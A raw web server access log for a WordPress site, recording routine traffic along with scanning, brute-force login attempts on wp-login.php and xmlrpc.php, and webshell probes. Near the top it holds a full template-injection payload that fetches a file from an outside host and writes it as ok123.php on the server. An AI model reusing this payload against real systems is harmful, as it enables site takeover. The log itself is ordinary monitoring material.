45.204.213.103 - - [11/Sep/2025:01:42:02 +0800] "GET /e/aspx/upload.aspx?a=pageadmin_cms HTTP/1.1" 301 5 "http://www.cqqizhou.com/e/aspx/upload.aspx?a=pageadmin_cms" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.4 Safari/532.2"
45.204.213.103 - - [11/Sep/2025:01:42:03 +0800] "GET /e/aspx/upload.aspx?a=pageadmin_cms HTTP/1.1" 404 31381 "http://www.cqqizhou.com/e/aspx/upload.aspx?a=pageadmin_cms" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.4 Safari/532.2"
45.204.213.103 - - [11/Sep/2025:01:42:05 +0800] "POST /index.php?s=captcha HTTP/1.1" 400 2528 "http://www.cqqizhou.com/index.php?s=captcha" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
45.204.213.103 - - [11/Sep/2025:01:42:05 +0800] "GET /zbct.php HTTP/1.1" 404 27 "http://www.cqqizhou.com/zbct.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.3 Safari/532.2"
45.204.213.103 - - [11/Sep/2025:01:42:08 +0800] "POST / HTTP/1.1" 200 151919 "http://www.cqqizhou.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5"
45.204.213.103 - - [11/Sep/2025:01:42:10 +0800] "GET /tvpy.php HTTP/1.1" 404 27 "http://www.cqqizhou.com/tvpy.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.2 Safari/532.2"
45.204.213.103 - - [11/Sep/2025:01:42:10 +0800] "POST /utility/convert/index.php?a=config&source=d7.2_x2.0 HTTP/1.1" 404 27 "http://www.cqqizhou.com/utility/convert/index.php?a=config&source=d7.2_x2.0" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.212.1 Safari/532.1"
45.204.213.103 - - [11/Sep/2025:01:42:10 +0800] "POST /utility/convert/data/config.inc.php HTTP/1.1" 404 27 "http://www.cqqizhou.com/utility/convert/data/config.inc.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.16) Gecko/20101130 Firefox/3.5.16 GTB7.1"
45.204.213.103 - - [11/Sep/2025:01:42:11 +0800] "GET /?tag&tagstpl=news.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=runtime/cache/ok123.php&t2=file_get_contents&t3=http://mindpine.net/css/404.txt HTTP/1.1" 301 5 "http://www.cqqizhou.com/?tag&tagstpl=news.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=runtime/cache/ok123.php&t2=file_get_contents&t3=http://mindpine.net/css/404.txt" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729)"
45.204.213.103 - - [11/Sep/2025:01:42:12 +0800] "GET /?tagstpl=news.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=runtime/cache/ok123.php&t2=file_get_contents&t3=http://mindpine.net/css/404.txt HTTP/1.1" 404 31381 "http://www.cqqizhou.com/?tag&tagstpl=news.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=runtime/cache/ok123.php&t2=file_get_contents&t3=http://mindpine.net/css/404.txt" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 MRA 5.5 (build 02842) Firefox/3.5.7 (.NET CLR 3.5.30729)"
45.204.213.103 - - [11/Sep/2025:01:42:13 +0800] "GET /runtime/cache/ok123.php HTTP/1.1" 404 27 "http://www.cqqizhou.com/runtime/cache/ok123.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13"
36.133.115.36 - - [11/Sep/2025:01:43:01 +0800] "POST /wp-cron.php?doing_wp_cron=1757526181.8385651111602783203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
188.166.234.199 - - [11/Sep/2025:01:43:01 +0800] "GET /wp-login.php HTTP/1.1" 200 2780 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
188.166.234.199 - - [11/Sep/2025:01:43:02 +0800] "POST /wp-login.php HTTP/1.1" 200 2889 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
115.159.33.43 - - [11/Sep/2025:01:43:43 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36"
36.133.115.36 - - [11/Sep/2025:01:46:01 +0800] "POST /wp-cron.php?doing_wp_cron=1757526361.3174099922180175781250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
51.91.161.103 - - [11/Sep/2025:01:46:01 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36"
51.91.161.103 - - [11/Sep/2025:01:46:02 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67"
36.133.115.36 - - [11/Sep/2025:01:51:15 +0800] "POST /wp-cron.php?doing_wp_cron=1757526675.0744879245758056640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.157.50.58 - - [11/Sep/2025:01:51:15 +0800] "GET /?p=2162 HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.157.50.58 - - [11/Sep/2025:01:51:19 +0800] "GET /2162/ HTTP/1.1" 200 21237 "http://cqqizhou.com/?p=2162" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [11/Sep/2025:01:54:46 +0800] "POST /wp-cron.php?doing_wp_cron=1757526886.0541560649871826171875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
103.82.36.71 - - [11/Sep/2025:01:54:46 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
103.82.36.71 - - [11/Sep/2025:01:54:46 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5"
36.133.115.36 - - [11/Sep/2025:02:01:09 +0800] "POST /wp-cron.php?doing_wp_cron=1757527269.4190979003906250000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
170.106.11.141 - - [11/Sep/2025:02:01:09 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2F2164%2F HTTP/1.1" 200 1233 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [11/Sep/2025:02:05:29 +0800] "POST /wp-cron.php?doing_wp_cron=1757527529.5851249694824218750000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.253 - - [11/Sep/2025:02:05:30 +0800] "GET / HTTP/1.1" 200 151919 "-" "-"
36.133.115.36 - - [11/Sep/2025:02:08:12 +0800] "POST /wp-cron.php?doing_wp_cron=1757527692.8591101169586181640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
49.12.205.4 - - [11/Sep/2025:02:08:12 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0"
49.12.205.4 - - [11/Sep/2025:02:08:14 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
36.133.115.36 - - [11/Sep/2025:02:09:41 +0800] "POST /wp-cron.php?doing_wp_cron=1757527781.7333929538726806640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
34.139.88.150 - - [11/Sep/2025:02:09:41 +0800] "HEAD /bc HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.20 Safari/537.36"
34.139.88.150 - - [11/Sep/2025:02:09:42 +0800] "HEAD /wp HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36"
34.139.88.150 - - [11/Sep/2025:02:09:45 +0800] "HEAD /bk HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.140 Safari/537.36 Vivaldi/6.4.3160.47"
34.139.88.150 - - [11/Sep/2025:02:09:45 +0800] "HEAD /new HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.200 YaBrowser/24.1.0.0 Safari/537.36"
34.139.88.150 - - [11/Sep/2025:02:09:46 +0800] "HEAD /news/ HTTP/1.1" 200 0 "http://cqqizhou.com/new" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.200 YaBrowser/24.1.0.0 Safari/537.36"
36.133.115.36 - - [11/Sep/2025:02:09:48 +0800] "POST /wp-cron.php?doing_wp_cron=1757527788.2874979972839355468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
34.139.88.150 - - [11/Sep/2025:02:09:48 +0800] "HEAD /main HTTP/1.1" 404 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0"
34.139.88.150 - - [11/Sep/2025:02:09:48 +0800] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.200 YaBrowser/24.1.0.0 Safari/537.36"
34.139.88.150 - - [11/Sep/2025:02:09:49 +0800] "HEAD /backup HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15"
34.139.88.150 - - [11/Sep/2025:02:09:50 +0800] "HEAD /wordpress HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_7_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15"
34.139.88.150 - - [11/Sep/2025:02:09:51 +0800] "HEAD /home HTTP/1.1" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36"
34.139.88.150 - - [11/Sep/2025:02:09:51 +0800] "HEAD / HTTP/1.1" 200 0 "http://cqqizhou.com/home" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36"
34.139.88.150 - - [11/Sep/2025:02:09:52 +0800] "HEAD /old HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15"
36.133.115.36 - - [11/Sep/2025:02:11:48 +0800] "POST /wp-cron.php?doing_wp_cron=1757527908.0342059135437011718750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
49.51.36.179 - - [11/Sep/2025:02:11:48 +0800] "GET /2215/ HTTP/1.1" 200 20083 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [11/Sep/2025:02:12:52 +0800] "POST /wp-cron.php?doing_wp_cron=1757527972.1392149925231933593750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
173.249.59.196 - - [11/Sep/2025:02:12:52 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5"
173.249.59.196 - - [11/Sep/2025:02:12:53 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36"
36.133.115.36 - - [11/Sep/2025:02:21:20 +0800] "POST /wp-cron.php?doing_wp_cron=1757528480.2886159420013427734375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [11/Sep/2025:02:21:20 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [11/Sep/2025:02:22:18 +0800] "POST /wp-cron.php?doing_wp_cron=1757528538.8486099243164062500000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
160.30.113.79 - - [11/Sep/2025:02:22:18 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
160.30.113.79 - - [11/Sep/2025:02:22:19 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5"
36.133.115.36 - - [11/Sep/2025:02:23:28 +0800] "POST /wp-cron.php?doing_wp_cron=1757528608.5542690753936767578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [11/Sep/2025:02:24:28 +0800] "GET / HTTP/1.1" 200 96805 "-" "-"
36.133.115.36 - - [11/Sep/2025:02:26:13 +0800] "POST /wp-cron.php?doing_wp_cron=1757528773.9065539836883544921875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
196.251.69.194 - - [11/Sep/2025:02:26:14 +0800] "GET / HTTP/1.0" 200 151897 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
43.164.197.224 - - [11/Sep/2025:02:26:42 +0800] "GET /wp-content/uploads/2025/07/1753454089-Article_images_W900px.webp HTTP/1.1" 200 27552 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [11/Sep/2025:02:26:54 +0800] "POST /wp-cron.php?doing_wp_cron=1757528814.8518180847167968750000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
31.11.36.220 - - [11/Sep/2025:02:26:54 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
31.11.36.220 - - [11/Sep/2025:02:26:56 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36"
36.133.115.36 - - [11/Sep/2025:02:31:35 +0800] "POST /wp-cron.php?doing_wp_cron=1757529095.5377020835876464843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.119.84.83 - - [11/Sep/2025:02:31:35 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5"
45.119.84.83 - - [11/Sep/2025:02:31:36 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
36.133.115.36 - - [11/Sep/2025:02:32:56 +0800] "POST /wp-cron.php?doing_wp_cron=1757529176.8068010807037353515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
112.196.0.228 - - [11/Sep/2025:02:32:56 +0800] "GET /wp-login.php HTTP/1.1" 200 2780 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
112.196.0.228 - - [11/Sep/2025:02:32:58 +0800] "POST /wp-login.php HTTP/1.1" 200 2889 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [11/Sep/2025:02:34:52 +0800] "POST /wp-cron.php?doing_wp_cron=1757529292.2108910083770751953125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.133.66.51 - - [11/Sep/2025:02:34:52 +0800] "GET /industry/ HTTP/1.1" 200 18073 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
35.187.74.94 - - [11/Sep/2025:02:35:33 +0800] "GET / HTTP/1.1" 301 5 "-" "python-requests/2.32.4"
36.133.115.36 - - [11/Sep/2025:02:35:53 +0800] "POST /wp-cron.php?doing_wp_cron=1757529353.7725141048431396484375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
4.227.36.98 - - [11/Sep/2025:02:35:53 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.60 - - [11/Sep/2025:02:35:54 +0800] "GET /wp-sitemap.xml HTTP/1.1" 501 253 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
188.166.127.27 - - [11/Sep/2025:02:36:21 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
188.166.127.27 - - [11/Sep/2025:02:36:22 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36"
36.133.115.36 - - [11/Sep/2025:02:40:58 +0800] "POST /wp-cron.php?doing_wp_cron=1757529658.5401821136474609375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
165.84.219.106 - - [11/Sep/2025:02:40:58 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
165.84.219.106 - - [11/Sep/2025:02:40:59 +0800] "POST /wp-login.php HTTP/1.1" 200 2918 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15"
43.157.62.101 - - [11/Sep/2025:02:45:29 +0800] "GET /wp-content/uploads/2025/07/1753454299-Article_images_W900px-150x150.webp HTTP/1.1" 200 7416 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [11/Sep/2025:02:49:11 +0800] "POST /wp-cron.php?doing_wp_cron=1757530151.3921380043029785156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.156.87.179 - - [11/Sep/2025:02:49:12 +0800] "GET / HTTP/1.1" 200 151919 "-" "-"
36.133.115.36 - - [11/Sep/2025:02:50:39 +0800] "POST /wp-cron.php?doing_wp_cron=1757530239.0564680099487304687500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.157.50.58 - - [11/Sep/2025:02:50:39 +0800] "GET /policy/ HTTP/1.1" 200 18715 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [11/Sep/2025:03:16:41 +0800] "POST /wp-cron.php?doing_wp_cron=1757531801.5959401130676269531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
37.60.141.158 - - [11/Sep/2025:03:16:41 +0800] "POST /boaform/admin/formLogin HTTP/1.1" 404 8989 "http://36.133.115.36:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
36.133.115.36 - - [11/Sep/2025:03:17:41 +0800] "POST /wp-cron.php?doing_wp_cron=1757531861.4082660675048828125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
103.188.82.198 - - [11/Sep/2025:03:17:41 +0800] "GET /wp-login.php HTTP/1.1" 200 2780 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:96.0) Gecko/20071914 Firefox/96.0"
103.188.82.198 - - [11/Sep/2025:03:17:42 +0800] "POST /wp-login.php HTTP/1.1" 200 2977 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:96.0) Gecko/20071914 Firefox/96.0"
36.133.115.36 - - [11/Sep/2025:03:18:32 +0800] "POST /wp-cron.php?doing_wp_cron=1757531912.0339529514312744140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
203.33.203.148 - - [11/Sep/2025:03:18:32 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [11/Sep/2025:03:25:05 +0800] "POST /wp-cron.php?doing_wp_cron=1757532305.7576930522918701171875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [11/Sep/2025:03:25:06 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [11/Sep/2025:03:33:24 +0800] "POST /wp-cron.php?doing_wp_cron=1757532804.4946649074554443359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [11/Sep/2025:03:33:43 +0800] "GET / HTTP/1.1" 200 109837 "-" "-"
36.133.115.36 - - [11/Sep/2025:03:43:23 +0800] "POST /wp-cron.php?doing_wp_cron=1757533403.4982769489288330078125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
54.234.159.92 - - [11/Sep/2025:03:43:23 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
36.133.115.36 - - [11/Sep/2025:04:04:15 +0800] "POST /wp-cron.php?doing_wp_cron=1757534655.2881739139556884765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
213.155.227.119 - - [11/Sep/2025:04:04:15 +0800] "GET /wp-login.php HTTP/1.1" 200 2780 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
213.155.227.119 - - [11/Sep/2025:04:04:17 +0800] "POST /wp-login.php HTTP/1.1" 200 2889 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [11/Sep/2025:04:13:51 +0800] "POST /wp-cron.php?doing_wp_cron=1757535231.0024991035461425781250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
142.93.147.91 - - [11/Sep/2025:04:13:51 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
142.93.147.91 - - [11/Sep/2025:04:13:51 +0800] "GET / HTTP/1.1" 200 39369 "http://36.133.115.36/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
142.93.147.91 - - [11/Sep/2025:04:13:53 +0800] "GET /form.html HTTP/1.1" 404 8990 "-" "curl/8.1.2"
142.93.147.91 - - [11/Sep/2025:04:13:54 +0800] "GET /upl.php HTTP/1.1" 404 47 "-" "Mozilla/5.0"
142.93.147.91 - - [11/Sep/2025:04:13:55 +0800] "GET /t4 HTTP/1.1" 404 8990 "-" "Mozilla/5.0"
142.93.147.91 - - [11/Sep/2025:04:13:56 +0800] "GET /geoip/ HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
142.93.147.91 - - [11/Sep/2025:04:13:57 +0800] "GET /1.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
142.93.147.91 - - [11/Sep/2025:04:13:58 +0800] "GET /systembc/password.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
142.93.147.91 - - [11/Sep/2025:04:13:58 +0800] "GET /password.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
36.133.115.36 - - [11/Sep/2025:04:25:51 +0800] "POST /wp-cron.php?doing_wp_cron=1757535951.6039810180664062500000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [11/Sep/2025:04:25:51 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [11/Sep/2025:04:41:13 +0800] "POST /wp-cron.php?doing_wp_cron=1757536873.5641109943389892578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [11/Sep/2025:04:41:13 +0800] "GET / HTTP/1.1" 301 5 "-" "-"
